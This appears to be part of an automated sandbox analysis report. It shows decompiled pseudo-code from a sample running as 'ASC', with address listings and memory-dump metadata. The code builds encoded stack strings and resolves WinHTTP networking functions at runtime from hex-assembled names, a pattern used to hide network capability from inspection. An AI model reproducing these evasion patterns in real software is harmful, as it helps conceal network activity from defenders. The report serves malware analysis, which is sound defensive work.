				 *((short*)(_t889 - 0x366)) = 0xdb;
				 *((short*)(_t889 - 0x368)) = 0xc3;
				 *((short*)(_t889 - 0x36a)) = 0xdb;
				 *((short*)(_t889 - 0x36c)) = 0xc3;
				 *((short*)(_t889 - 0x36e)) = 0xdb;
				 *((short*)(_t889 - 0x370)) = 0xc3;
				 *((short*)(_t889 - 0x372)) = 0xdb;
				 *((short*)(_t889 - 0x374)) = 0xc3;
				 *((short*)(_t889 - 0x376)) = 0xc6;
				 *((short*)(_t889 - 0x378)) = 0xdc;
				 *((short*)(_t889 - 0x37a)) = 0x88;
				 *((short*)(_t889 - 0x37c)) = 0x89;
				 *((short*)(_t889 - 0x37e)) = 0x8f;
				 *((short*)(_t889 - 0x380)) = 0xdb;
				 *((short*)(_t889 - 0x382)) = 0x94;
				 *((short*)(_t889 - 0x384)) = 0x83;
				 *((short*)(_t889 - 0x386)) = 0xb0;
				 *((short*)(_t889 - 0x388)) = 0xc6;
				 *((short*)(_t889 - 0x38a)) = 0xdb;
				 *((short*)(_t889 - 0x38c)) = 0x91;
				 *((short*)(_t889 - 0x38e)) = 0x89;
				 *((short*)(_t889 - 0x390)) = 0x82;
				 *((short*)(_t889 - 0x392)) = 0x88;
				 *((short*)(_t889 - 0x394)) = 0x8f;
				 *((short*)(_t889 - 0x396)) = 0xb1;
				 *((short*)(_t889 - 0x398)) = 0xec;
				 *((short*)(_t889 - 0x39a)) = 0xec;
				 *((short*)(_t889 - 0x39c)) = 0x8a;
				 *((short*)(_t889 - 0x39e)) = 0x87;
				 *((short*)(_t889 - 0x3a0)) = 0x92;
				 *((short*)(_t889 - 0x3a2)) = 0x89;
				 *((short*)(_t889 - 0x3a4)) = 0x92;
				 *((short*)(_t889 - 0x3a6)) = 0xc6;
				 *((short*)(_t889 - 0x3a8)) = 0xa4;
				 *((short*)(_t889 - 0x3aa)) = 0xab;
				 *((short*)(_t889 - 0x3ac)) = 0x82;
				 *((short*)(_t889 - 0x3ae)) = 0xc3;
				 *((short*)(_t889 - 0x3b0)) = 0xc6;
				 *((short*)(_t889 - 0x3b2)) = 0xc9;
				 *((short*)(_t889 - 0x3b4)) = 0xc6;
				 *((short*)(_t889 - 0x3b6)) = 0x83;
				 *((short*)(_t889 - 0x3b8)) = 0x83;
				 *((short*)(_t889 - 0x3ba)) = 0x94;
				 *((short*)(_t889 - 0x3bc)) = 0x80;
				 *((short*)(_t889 - 0x3be)) = 0xc6;
				 *((short*)(_t889 - 0x3c0)) = 0xa4;
				 *((short*)(_t889 - 0x3c2)) = 0xab;
				 *((short*)(_t889 - 0x3c4)) = 0x82;
				 *((short*)(_t889 - 0x3c6)) = 0xc3;
				 *((short*)(_t889 - 0x3c8)) = 0xc6;
				 *((short*)(_t889 - 0x3ca)) = 0xdc;
				 *((short*)(_t889 - 0x3cc)) = 0x8d;
				 *((short*)(_t889 - 0x3ce)) = 0xdb;
				 *((short*)(_t889 - 0x3d0)) = 0x8f;
				 *((short*)(_t889 - 0x3d2)) = 0xa2;
				 *((short*)(_t889 - 0x3d4)) = 0xc6;
				 *((short*)(_t889 - 0x3d6)) = 0x82;
				 *((short*)(_t889 - 0x3d8)) = 0x94;
				 *((short*)(_t889 - 0x3da)) = 0x87;
				 *((short*)(_t889 - 0x3dc)) = 0xae;
				 *((short*)(_t889 - 0x3de)) = 0xec;
				 *((short*)(_t889 - 0x3e0)) = 0xcf;
				 *((short*)(_t889 - 0x3e2)) = 0x82;
				 *((short*)(_t889 - 0x3e4)) = 0x83;
				 *((short*)(_t889 - 0x3e6)) = 0xdb;
				 *((short*)(_t889 - 0x3e8)) = 0x93;
				 *((short*)(_t889 - 0x3ea)) = 0xc6;
				 *((short*)(_t889 - 0x3ec)) = 0xc3;
				 *((short*)(_t889 - 0x3ee)) = 0xc3;
				 *((short*)(_t889 - 0x3f0)) = 0x93;
				 *((short*)(_t889 - 0x3f2)) = 0xc3;
				 *((short*)(_t889 - 0x3f4)) = 0xce;
				 *((short*)(_t889 - 0x3f6)) = 0xc6;
				 *((short*)(_t889 - 0x3f8)) = 0x8a;
				 *((short*)(_t889 - 0x3fa)) = 0x87;
				 *((short*)(_t889 - 0x3fc)) = 0x92;
				 *((short*)(_t889 - 0x3fe)) = 0x89;
				 *((short*)(_t889 - 0x400)) = 0x92;
				 *((short*)(_t889 - 0x402)) = 0xc6;
				 *((short*)(_t889 - 0x404)) = 0xa4;
				 *((short*)(_t889 - 0x406)) = 0xab;
				 *((short*)(_t889 - 0x408)) = 0x82;
				 *((short*)(_t889 - 0x40a)) = 0xc3;
				 *((short*)(_t889 - 0x40c)) = 0xc6;
				 *((short*)(_t889 - 0x40e)) = 0x83;
				 *((short*)(_t889 - 0x410)) = 0x83;
				 *((short*)(_t889 - 0x412)) = 0x94;
				 *((short*)(_t889 - 0x414)) = 0x80;
				 *((short*)(_t889 - 0x416)) = 0xc6;
				 *((short*)(_t889 - 0x418)) = 0xa4;
				 *((short*)(_t889 - 0x41a)) = 0xab;
				 *((short*)(_t889 - 0x41c)) = 0x82;
				 *((short*)(_t889 - 0x41e)) = 0xc3;
				 *((short*)(_t889 - 0x420)) = 0xc6;
				 *((short*)(_t889 - 0x422)) = 0xdc;
				 *((short*)(_t889 - 0x424)) = 0xab;
				 *((short*)(_t889 - 0x426)) = 0xa7;
				 *((short*)(_t889 - 0x428)) = 0xb4;
				 *((short*)(_t889 - 0x42a)) = 0xec;
				 *((short*)(_t889 - 0x42c)) = 0x95;
				 *((short*)(_t889 - 0x42e)) = 0xc3;
				 *((short*)(_t889 - 0x430)) = 0xc6;
				 *((short*)(_t889 - 0x432)) = 0xdc;
				 *((short*)(_t889 - 0x434)) = 0x83;
				 *((short*)(_t889 - 0x44e)) = 0x95;
				 *((short*)(_t889 - 0x436)) = 0x94;
				 *((short*)(_t889 - 0x450)) = 0xc3;
				 *((short*)(_t889 - 0x438)) = 0x93;
				 *((short*)(_t889 - 0x440)) = 0x92;
				 *((short*)(_t889 - 0x452)) = 0xc6;
				 *((short*)(_t889 - 0x442)) = 0x8f;
				 *((short*)(_t889 - 0x45c)) = 0xb3;
				 *((short*)(_t889 - 0x444)) = 0x8e;
				 *((short*)(_t889 - 0x45e)) = 0xb6;
				 *((short*)(_t889 - 0x446)) = 0x85;
				 *((short*)(_t889 - 0x460)) = 0xa5;
				_t520 =  *(_t889 - 0x18);
				 *((short*)(_t889 - 0x448)) = 0x94;
				 *((short*)(_t889 - 0x43a)) = 0x92;
				 *((intOrPtr*)(_t889 - 0x43e)) = 0x850083;
				 *((intOrPtr*)(_t889 - 0x44c)) = 0xa700ec;
				 *((intOrPtr*)(_t889 - 0x456)) = 0x8200c3;
				 *((intOrPtr*)(_t889 - 0x45a)) = 0xc600dc;
				 *((char*)(_t889 - 0x256)) = 0;
				_t879 = 0x12e06d0;
				 *(_t889 - 0xa4) = _t520;
				if(_t520 == 0) {
					 *(_t889 - 0xa4) = 0x12e06d0;
				}
				_t521 =  *(_t889 - 0x9c);
				 *(_t889 - 0xa8) = _t521;
				if(_t521 == 0) {
					 *(_t889 - 0xa8) = _t879;
				}
				_t886 =  *(_t889 - 4);
				_t522 = _t886[0x288];
				if(_t522 == 0) {
					_t523 = _t889 - 0x128;
					goto L36;
				} else {
					if(_t522 != 1) {
						_t523 = _t889 - 0x114;
						L36:
						 *(_t889 - 4) = _t523;
					} else {
						 *(_t889 - 4) = _t879;
					}
				}
				_t524 =  &(_t886[0x208]);
				_t821 =  *_t524 & 0x0000ffff;
				 *(_t889 - 0xa0) = 0x12e06d4;
				if(_t821 != 0) {
					 *(_t889 - 0x94) = _t524;
				} else {
					 *(_t889 - 0xa0) = _t879;
					 *(_t889 - 0x94) = _t879;
				}
				 *(_t889 - 0x84) = 0x12e06d8;
				if(_t821 == 0) {
					 *(_t889 - 0x84) = _t879;
				}
				_t525 =  *((intOrPtr*)(_t889 - 8));
				if(_t525 == 0) {
					_t525 = E012C102D(_t889 - 0x100);
				}
				_t822 =  &(_t886[0x188]);
				_t849 =  *_t822 & 0x0000ffff;
				 *(_t889 - 0x8c) = 0x12e06d4;
				if(_t849 != 0) {
					 *(_t889 - 0x98) = _t822;
				} else {
					 *(_t889 - 0x8c) = _t879;
					 *(_t889 - 0x98) = _t879;
				}
				 *(_t889 - 0x88) = 0x12e06d8;
				if(_t849 == 0) {
					 *(_t889 - 0x88) = _t879;
				}
				_t823 = _t889 - 0xbc;
				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
					_t823 = _t889 - 0xd0;
				}
				_t850 = _t886[0xc8] & 0x0000ffff;
				 *((intOrPtr*)(_t889 - 0x80)) = _t823;
				 *(_t889 - 0x30) = 0x12e06d4;
				if(_t850 != 0) {
					_t773 =  &(_t886[0xc8]);
				} else {
					 *(_t889 - 0x30) = _t879;
					_t773 = _t879;
				}
				if(_t850 != 0) {
					_t879 = 0x12e06d8;
				}
				_t851 = _t889 - 0xbc;
				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
					_t851 = _t889 - 0xd0;
				}
				_push( *(_t889 - 0xa4));
				_push( *(_t889 - 0xa8));
				_push( &(_t886[0x248]));
				_push( *(_t889 - 4));
				_push( *(_t889 - 0xa0));
				_push( *(_t889 - 0x94));
				_push( *(_t889 - 0x84));
				_push( &(_t886[0x1c8]));
				_push(_t525);
				_push( &(_t886[0x29c]));
				_push( &(_t886[0x28c]));
				_push( &(_t886[0x108]));
				_push( *(_t889 - 0x8c));
				_push( *(_t889 - 0x98));
				_push( *(_t889 - 0x88));
				_push( &(_t886[0x148]));
				_push( *((intOrPtr*)(_t889 - 0x80)));
				_push( *(_t889 - 0x30));
				_push(_t773);
				_push(_t879);
				_push( &(_t886[0x88]));
				_push(_t886[0x2ac]);
				_push(_t886[0x2ae]);
				_push(_t886[0x86]);
				_push(_t886[0x82]);
				_push(_t886[0x84]);
				_push(_t851);
				_push(_t886);
				_t532 = E012C1048(_t889 - 0x460);
				_t880 =  *((intOrPtr*)(_t889 - 0x470));
				E012C1000( *((intOrPtr*)(_t889 - 0x464)), _t532, _t886[0x80]);
				_t535 = E012C1195(_t851, _t880, _t886, 8);
				_t826 = _t880;
				 *0x12e5978 = _t535;
				 *((intOrPtr*)(_t535 + 4)) = _t880;
				_t852 = _t826 + 2;
				do {
					_t881 =  *_t826;
					_t826 = _t826 + 2;
				} while (_t881 != 0);
				_t828 = _t826 - _t852 >> 1;
				_t829 = _t828 + _t828 + 2;
				 *_t535 = _t828 + _t828 + 2;
				if( *((intOrPtr*)(_t889 - 0x10)) != 0) {
					_t540 =  *((intOrPtr*)(_t889 - 0xc));
					if(_t540 != 0) {
						_t829 =  *_t540;
						 *((intOrPtr*)( *_t540 + 8))(_t540);
					}
					_t541 =  *((intOrPtr*)(_t889 - 0x14));
					if(_t541 != 0) {
						_t829 =  *_t541;
						 *((intOrPtr*)( *_t541 + 8))(_t541);
					}
				}
				if( *((intOrPtr*)(_t889 - 8)) != 0) {
					E012C115B(_t829, _t852, _t886,  *((intOrPtr*)(_t889 - 8)));
					_pop(_t829);
				}
				E012C115B(_t829, _t852, _t886,  *(_t889 - 0x9c));
				_pop(_t830);
				E012C115B(_t830, _t852, _t886,  *(_t889 - 0x18));
				_pop(_t831);
				_t538 = E012C115B(_t831, _t852, _t886, _t886);
				return _t538;
			}

0x012d41c3
0x012d41c3
0x012d41c4
0x012d41cc
0x012d41d3
0x012d41d4
0x012d41da
0x012d41db
0x012d41e0
0x012d4216
0x012d421c
0x012d41e2
0x012d41f5
0x012d4201
0x012d420b
0x012d420e
0x012d420e
0x012d4223
0x012d4231
0x012d423a
0x012d423b
0x012d4241
0x012d4247
0x012d424a
0x012d4256
0x012d4260
0x012d4260
0x012d4265
0x012d4280
0x012d4267
0x012d4267
0x012d4269
0x012d4269
0x012d426c
0x012d426c
0x012d426f
0x012d4272
0x012d427b
0x012d427b
0x012d4285
0x012d42a0
0x012d4287
0x012d4287
0x012d428a
0x012d428d
0x012d428d
0x012d4290
0x012d4293
0x012d429c
0x012d429c
0x012d42aa
0x012d42b0
0x012d42b6
0x012d42bb
0x012d42bb
0x012d42bd
0x012d42be
0x012d42be
0x012d42c3
0x012d42de
0x012d42c5
0x012d42c5
0x012d42c7
0x012d42c7
0x012d42ca
0x012d42ca
0x012d42cd
0x012d42d0
0x012d42d9
0x012d42d9
0x012d42e3
0x012d42fe
0x012d42e5
0x012d42e5
0x012d42e8
0x012d42eb
0x012d42eb
0x012d42ee
0x012d42f1
0x012d42fa
0x012d42fa
0x012d4309
0x012d430f
0x012d4314
0x012d431b
0x012d431e
0x012d4325
0x012d4328
0x012d432f
0x012d4332
0x012d4339
0x012d433c
0x012d4343
0x012d4346
0x012d434d
0x012d4350
0x012d4357
0x012d435a
0x012d4363
0x012d436c
0x012d4373
0x012d4376
0x012d437d
0x012d4380
0x012d4387
0x012d438a
0x012d4391
0x012d4394
0x012d439b
0x012d439e
0x012d43a5
0x012d43a8
0x012d43af
0x012d43b0
0x012d43bb
0x012d43c4
0x012d43cb
0x012d43ce
0x012d43d5
0x012d43d8
0x012d43df
0x012d43e2
0x012d43e9
0x012d43ec
0x012d43f3
0x012d43f6
0x012d43fd
0x012d4400
0x012d4407
0x012d4408
0x012d4411
0x012d4418
0x012d4421
0x012d4424
0x012d442b
0x012d442e
0x012d4435
0x012d4438
0x012d443f
0x012d4440
0x012d4449
0x012d444a
0x012d4453
0x012d4454
0x012d445d
0x012d445e
0x012d4467
0x012d4473
0x012d447f
0x012d448b
0x012d4495
0x012d449e
0x012d44aa
0x012d44b3
0x012d44bf
0x012d44c9
0x012d44d2
0x012d44e0
0x012d44ec
0x012d44f6
0x012d4500
0x012d450a
0x012d4514
0x012d451e
0x012d4528
0x012d4534
0x012d453e
0x012d4545
0x012d454d
0x012d4559
0x012d4563
0x012d456d
0x012d4575
0x012d457e
0x012d4588
0x012d4592
0x012d459c
0x012d45a5
0x012d45af
0x012d45b9
0x012d45c0
0x012d45ca
0x012d45d3
0x012d45dc
0x012d45e5
0x012d45ee
0x012d45f8
0x012d4602
0x012d460a
0x012d4614
0x012d461e
0x012d4628
0x012d4631
0x012d463b
0x012d4644
0x012d464d
0x012d4657
0x012d4660
0x012d466a
0x012d4672
0x012d467e
0x012d4685
0x012d468f
0x012d469c
0x012d46a3
0x012d46af
0x012d46b8
0x012d46c1
0x012d46ca
0x012d46d3
0x012d46dd
0x012d46e7
0x012d46ee
0x012d46fa
0x012d4701
0x012d470e
0x012d4717
0x012d4720
0x012d4729
0x012d4732
0x012d473b
0x012d4744
0x012d474d
0x012d4756
0x012d475f
0x012d4768
0x012d4771
0x012d477a
0x012d4784
0x012d478e
0x012d4797
0x012d47a4
0x012d47ab
0x012d47b7
0x012d47c0
0x012d47ca
0x012d47d3
0x012d47da
0x012d47e4
0x012d47ed
0x012d47f6
0x012d4800
0x012d4809
0x012d4812
0x012d481b
0x012d4825
0x012d482e
0x012d4837
0x012d4840
0x012d484a
0x012d4853
0x012d485d
0x012d4867
0x012d4871
0x012d487b
0x012d4882
0x012d488f
0x012d4898
0x012d48a2
0x012d48ab
0x012d48b4
0x012d48be
0x012d48c7
0x012d48d0
0x012d48d9
0x012d48e2
0x012d48eb
0x012d48f4
0x012d48fd
0x012d4906
0x012d490f
0x012d4918
0x012d4922
0x012d492c
0x012d4936
0x012d493f
0x012d4949
0x012d4952
0x012d495c
0x012d4965
0x012d496f
0x012d4978
0x012d4982
0x012d498c
0x012d4995
0x012d499f
0x012d49a8
0x012d49b1
0x012d49ba
0x012d49c3
0x012d49cc
0x012d49d5
0x012d49de
0x012d49e7
0x012d49f0
0x012d49f9
0x012d4a02
0x012d4a0b
0x012d4a15
0x012d4a1f
0x012d4a29
0x012d4a33
0x012d4a3c
0x012d4a46
0x012d4a4f
0x012d4a59
0x012d4a62
0x012d4a6b
0x012d4a75
0x012d4a7f
0x012d4a89
0x012d4a93
0x012d4a9d
0x012d4aa7
0x012d4ab0
0x012d4ab7
0x012d4ac1
0x012d4acb
0x012d4ad5
0x012d4adf
0x012d4ae9
0x012d4af2
0x012d4afc
0x012d4b06
0x012d4b10
0x012d4b19
0x012d4b22
0x012d4b2c
0x012d4b35
0x012d4b3e
0x012d4b45
0x012d4b4f
0x012d4b59
0x012d4b62
0x012d4b6c
0x012d4b76
0x012d4b80
0x012d4b89
0x012d4b92
0x012d4b9c
0x012d4ba6
0x012d4baf
0x012d4bb9
0x012d4bc3
0x012d4bcc
0x012d4bd6
0x012d4be0
0x012d4bea
0x012d4bf4
0x012d4bfd
0x012d4c07
0x012d4c11
0x012d4c1a
0x012d4c23
0x012d4c2d
0x012d4c36
0x012d4c3f
0x012d4c46
0x012d4c50
0x012d4c59
0x012d4c63
0x012d4c6c
0x012d4c76
0x012d4c80
0x012d4c8a
0x012d4c94
0x012d4c9e
0x012d4ca7
0x012d4cb1
0x012d4cbb
0x012d4cc5
0x012d4cce
0x012d4cd7
0x012d4ce0
0x012d4ce7
0x012d4cf1
0x012d4cfb
0x012d4d04
0x012d4d0e
0x012d4d18
0x012d4d22
0x012d4d2b
0x012d4d34
0x012d4d3e
0x012d4d48
0x012d4d52
0x012d4d5c
0x012d4d65
0x012d4d6e
0x012d4d77
0x012d4d80
0x012d4d8a
0x012d4d93
0x012d4d9d
0x012d4da4
0x012d4dae
0x012d4db5
0x012d4dc1
0x012d4dcd
0x012d4dd4
0x012d4dde
0x012d4deb
0x012d4df5
0x012d4dff
0x012d4e09
0x012d4e10
0x012d4e13
0x012d4e1a
0x012d4e21
0x012d4e2b
0x012d4e35
0x012d4e3f
0x012d4e49
0x012d4e50
0x012d4e55
0x012d4e5d
0x012d4e5f
0x012d4e5f
0x012d4e65
0x012d4e6b
0x012d4e73
0x012d4e75
0x012d4e75
0x012d4e7b
0x012d4e7e
0x012d4e86
0x012d4e9a
0x00000000
0x012d4e88
0x012d4e8b
0x012d4e92
0x012d4ea0
0x012d4ea0
0x012d4e8d
0x012d4e8d
0x012d4e8d
0x012d4e8b
0x012d4ea3
0x012d4ea9
0x012d4eac
0x012d4eb9
0x012d50ab
0x012d4ebf
0x012d4ebf
0x012d4ec5
0x012d4ec5
0x012d4ed0
0x012d4ed9
0x012d4edb
0x012d4edb
0x012d4ee1
0x012d4ee6
0x012d4eee
0x012d4eee
0x012d4ef3
0x012d4ef9
0x012d4efc
0x012d4f09
0x012d50b6
0x012d4f0f
0x012d4f0f
0x012d4f15
0x012d4f15
0x012d4f1b
0x012d4f24
0x012d4f26
0x012d4f26
0x012d4f33
0x012d4f39
0x012d4f3b
0x012d4f3b
0x012d4f41
0x012d4f48
0x012d4f4b
0x012d4f55
0x012d50c1
0x012d4f5b
0x012d4f5b
0x012d4f5e
0x012d4f5e
0x012d4f63
0x012d4f65
0x012d4f65
0x012d4f71
0x012d4f77
0x012d4f79
0x012d4f79
0x012d4f7f
0x012d4f8b
0x012d4f91
0x012d4f92
0x012d4f9b
0x012d4fa1
0x012d4fa7
0x012d4fad
0x012d4fae
0x012d4fb5
0x012d4fbc
0x012d4fc3
0x012d4fc4
0x012d4fd0
0x012d4fd6
0x012d4fdc
0x012d4fdd
0x012d4fe6
0x012d4fe9
0x012d4fea
0x012d4feb
0x012d4fec
0x012d4ff8
0x012d4ffe
0x012d5004
0x012d500a
0x012d5010
0x012d5011
0x012d5018
0x012d501d
0x012d502a
0x012d5031
0x012d5036
0x012d503b
0x012d5040
0x012d5043
0x012d5046
0x012d5046
0x012d5049
0x012d504c
0x012d5053
0x012d5059
0x012d505d
0x012d505f
0x012d5061
0x012d5066
0x012d5068
0x012d506b
0x012d506b
0x012d506e
0x012d5073
0x012d5075
0x012d5078
0x012d5078
0x012d5073
0x012d507f
0x012d5084
0x012d5089
0x012d5089
0x012d5090
0x012d5095
0x012d5099
0x012d509e
0x012d50a0
0x012d50aa

APIs

GetProcAddress.KERNEL32 ref: 012D41C4

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 014301CE, Relevance: 1.4, Strings: 1, Instructions: 137

Strings

7!:V, xrefs: 01430347

Memory Dump Source

Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd

Function 012D6000, Relevance: 1.0, Instructions: 996

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D6EED, Relevance: 1.0, Instructions: 996

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D7EA6, Relevance: .3, Instructions: 327

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CFB7F, Relevance: .2, Instructions: 158

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D5B62, Relevance: 128.0, APIs: 13, Strings: 60, Instructions: 209
library

C-Code - Quality: 98%

			E012D5B62(void* __ecx, intOrPtr* __edi) {
				short _t134;
				short _t135;
				short _t136;
				short _t137;
				short _t138;
				short _t139;
				struct HINSTANCE__* _t142;
				void* _t143;
				_Unknown_base(*)()* _t168;
				intOrPtr* _t179;
				void* _t181;

				_t179 = _t181 - 0x78;
				_t134 = 0x57;
				 *((short*)(_t179 - 0xb4)) = _t134;
				_t135 = 0x69;
				 *((short*)(_t179 - 0xb2)) = _t135;
				_t136 = 0x6e;
				 *((short*)(_t179 - 0xb0)) = _t136;
				_t137 = 0x48;
				 *((short*)(_t179 - 0xae)) = _t137;
				_t138 = 0x74;
				 *((short*)(_t179 - 0xac)) = _t138;
				 *((short*)(_t179 - 0xaa)) = _t138;
				_t139 = 0x70;
				 *((short*)(_t179 - 0xa8)) = _t139;
				 *((short*)(_t179 - 0xa6)) = 0;
				_push(_t179 - 0xb4);
				_t142 = E0133CFF3(_t179 - 0xb4);
				 *(_t179 + 0x74) = _t142;
				if(_t142 == 0) {
					L14:
					_t143 = 0;
				} else {
					 *(_t179 - 8) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 4)) = 0x53707474;
					 *_t179 = 0x52646e65;
					 *((intOrPtr*)(_t179 + 4)) = 0x65757165;
					 *((short*)(_t179 + 8)) = 0x7473;
					 *((char*)(_t179 + 0xa)) = 0;
					 *__edi = GetProcAddress(_t142, _t179 - 8);
					 *(_t179 - 0xa4) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0xa0)) = 0x47707474;
					 *((intOrPtr*)(_t179 - 0x9c)) = 0x45497465;
					 *((intOrPtr*)(_t179 - 0x98)) = 0x786f7250;
					 *((intOrPtr*)(_t179 - 0x94)) = 0x6e6f4379;
					 *((intOrPtr*)(_t179 - 0x90)) = 0x46676966;
					 *((intOrPtr*)(_t179 - 0x8c)) = 0x7543726f;
					 *((intOrPtr*)(_t179 - 0x88)) = 0x6e657272;
					 *((intOrPtr*)(_t179 - 0x84)) = 0x65735574;
					 *((short*)(_t179 - 0x80)) = 0x72;
					 *((intOrPtr*)(__edi + 4)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0xa4);
					 *(_t179 + 0x34) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x38)) = 0x53707474;
					 *((intOrPtr*)(_t179 + 0x3c)) = 0x704f7465;
					 *((intOrPtr*)(_t179 + 0x40)) = 0x6e6f6974;
					 *((char*)(_t179 + 0x44)) = 0;
					 *((intOrPtr*)(__edi + 8)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x34);
					 *(_t179 + 0x20) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x24)) = 0x53707474;
					 *((intOrPtr*)(_t179 + 0x28)) = 0x69547465;
					 *((intOrPtr*)(_t179 + 0x2c)) = 0x756f656d;
					 *((short*)(_t179 + 0x30)) = 0x7374;
					 *((char*)(_t179 + 0x32)) = 0;
					 *((intOrPtr*)(__edi + 0xc)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x20);
					 *(_t179 - 0x60) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x5c)) = 0x52707474;
					 *((intOrPtr*)(_t179 - 0x58)) = 0x69656365;
					 *((intOrPtr*)(_t179 - 0x54)) = 0x65526576;
					 *((intOrPtr*)(_t179 - 0x50)) = 0x6e6f7073;
					 *((short*)(_t179 - 0x4c)) = 0x6573;
					 *((char*)(_t179 - 0x4a)) = 0;
					 *((intOrPtr*)(__edi + 0x10)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x60);
					 *(_t179 + 0x58) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
					 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
					 *((short*)(_t179 + 0x64)) = 0x7463;
					 *((char*)(_t179 + 0x66)) = 0;
					 *((intOrPtr*)(__edi + 0x14)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x58);
					 *(_t179 + 0x68) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x6c)) = 0x4f707474;
					 *((intOrPtr*)(_t179 + 0x70)) = 0x6e6570;
					 *((intOrPtr*)(__edi + 0x18)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x68);
					 *(_t179 + 0xc) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x10)) = 0x4f707474;
					 *((intOrPtr*)(_t179 + 0x14)) = 0x526e6570;
					 *((intOrPtr*)(_t179 + 0x18)) = 0x65757165;
					 *((short*)(_t179 + 0x1c)) = 0x7473;
					 *((char*)(_t179 + 0x1e)) = 0;
					 *((intOrPtr*)(__edi + 0x1c)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0xc);
					 *(_t179 - 0x48) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x44)) = 0x47707474;
					 *((intOrPtr*)(_t179 - 0x40)) = 0x72507465;
					 *((intOrPtr*)(_t179 - 0x3c)) = 0x4679786f;
					 *((intOrPtr*)(_t179 - 0x38)) = 0x7255726f;
					 *((short*)(_t179 - 0x34)) = 0x6c;
					 *((intOrPtr*)(__edi + 0x20)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x48);
					 *(_t179 + 0x48) = 0x486e6957;
					 *((intOrPtr*)(_t179 + 0x4c)) = 0x52707474;
					 *((intOrPtr*)(_t179 + 0x50)) = 0x44646165;
					 *((intOrPtr*)(_t179 + 0x54)) = 0x617461;
					 *((intOrPtr*)(__edi + 0x24)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x48);
					 *(_t179 - 0x1c) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x18)) = 0x43707474;
					 *((intOrPtr*)(_t179 - 0x14)) = 0x65736f6c;
					 *((intOrPtr*)(_t179 - 0x10)) = 0x646e6148;
					 *((short*)(_t179 - 0xc)) = 0x656c;
					 *((char*)(_t179 - 0xa)) = 0;
					 *((intOrPtr*)(__edi + 0x28)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x1c);
					 *(_t179 - 0x30) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x2c)) = 0x51707474;
					 *((intOrPtr*)(_t179 - 0x28)) = 0x79726575;
					 *((intOrPtr*)(_t179 - 0x24)) = 0x64616548;
